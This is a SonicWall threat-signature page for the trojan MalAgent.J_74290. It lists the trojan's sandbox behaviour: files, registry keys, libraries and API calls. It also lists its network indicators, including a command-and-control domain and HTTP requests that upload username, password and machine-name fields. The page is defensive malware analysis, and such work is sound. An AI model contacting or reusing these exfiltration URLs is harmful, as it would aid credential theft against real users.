SonicALERT
Sonicwall Signatures

MalAgent.J_74290
MalAgent.J_74290 is a Trojan. A Trojan is a program that pretends to have a valid use, but in fact modifies the user's computer in malicious ways. Trojans do not replicate or spread to other computers.

Mutexes created
• Nothing to report

Directory level activity
• Nothing to report

File level activity
• write - file - PIPE\lsarpc
• write - file - C:\DOCUME~1\TestMachine\LOCALS~1\Temp\S6xTJXmnGA.ini
• write - file - PIPE\lsarpc

Registry level activity
• write - registry - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersHistory
• write - registry - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersAppData
• write - registry - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersLocal AppData
• write - registry - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersLocal AppData

Library level activity
• load - library - C:\DOCUME~1\TestMachine\LOCALS~1\Temp\71d315fc9bf2cc69038d2c82fef11c9e.ENU
• load - library - C:\DOCUME~1\TestMachine\LOCALS~1\Temp\71d315fc9bf2cc69038d2c82fef11c9e.EN
• load - library - kernel32.dll
• load - library - oleaut32.dll
• load - library - USER32.DLL
• load - library - C:\DOCUME~1\TestMachine\LOCALS~1\Temp\71d315fc9bf2cc69038d2c82fef11c9e.bin
• load - library - USER32
• load - library - comctl32.dll
• load - library - User32.dll
• load - library - ole32.dll
• load - library - kernel32
• load - library - shell32
• load - library - user32
• load - library - C:\caxeieewto\dll\SjWlns.dll
• load - library - KERNEL32.DLL
• load - library - ADVAPI32.dll
• load - library - COMCTL32.dll
• load - library - comdlg32.dll
• load - library - GDI32.dll
• load - library - msvcrt.dll
• load - library - SHELL32.dll
• load - library - USER32.dll
• load - library - VERSION.dll
• load - library - shell32.dll
• load - library - advapi32.dll
• load - library - rsaenh.dll
• load - library - pstorec.dll
• load - library - C:\Program Files\Mozilla Firefox\nss3.dll
• load - library - Kernel32.dll
• load - library - nss3.dll
• load - library - C:\Program Files\Mozilla Firefox\softokn3.dll
• load - library - softokn3.dll
• load - library - C:\Program Files\Mozilla Firefox\nssdbm3.dll
• load - library - C:\Program Files\Mozilla Firefox\freebl3.dll
• load - library - C:\Documents and Settings\TestMachine\Application Data\Mozilla\Firefox\Profiles\6snjkamb.default/nssckbi.dll
• load - library - C:\Program Files\Mozilla Firefox\mozsqlite3.dll
• load - library - mscoree.dll
• load - library - RPCRT4.dll
• load - library - crypt32.dll
• load - library - Secur32.dll
• load - library - mscoree.dll

Process API calls used
• NtCreateSection
• ZwMapViewOfSection
• NtFreeVirtualMemory
• CreateProcessInternalW
• ExitProcess

Registry API calls used
• RegOpenKeyExA
• RegOpenKeyExA

System API calls used
• LdrGetDllHandle
• LdrGetProcedureAddress
• LdrLoadDll
• LdrLoadDll

Filesystem API calls used
• Nothing to report

Network

UDP source >> destination
• 192.168.30.254 >> 192.168.30.3
• 192.168.30.3 >> 192.168.30.254
• 192.168.30.3 >> 192.168.30.255
• 192.168.30.3 >> 8.8.8.8

TCP source >> destination
• 192.168.30.3 >> 192.168.30.254
• 192.168.30.3 >> 209.99.16.199

Domains:
• reiangkor.com with IP - 209.99.16.199

DNS Request:
• reiangkor.com

HTTP Request:
• GET URI - http://reiangkor.com/cgi-sys/suspendedpage.cgi?action=add&username=&password=&app=&pcname=XPSP3_3&sitename=
• GET URI - http://reiangkor.com/admin/PHP/index.php?action=add&username=&password=&app=&pcname=XPSP3_3&sitename=
DLL related data
Number of DLLs imported = 16
• kernel32.dll
• user32.dll
• advapi32.dll
• oleaut32.dll
• kernel32.dll
• advapi32.dll
• kernel32.dll
• version.dll
• gdi32.dll
• user32.dll
• kernel32.dll
• oleaut32.dll
• ole32.dll
• oleaut32.dll
• comctl32.dll
• comdlg32.dll

Relevant Information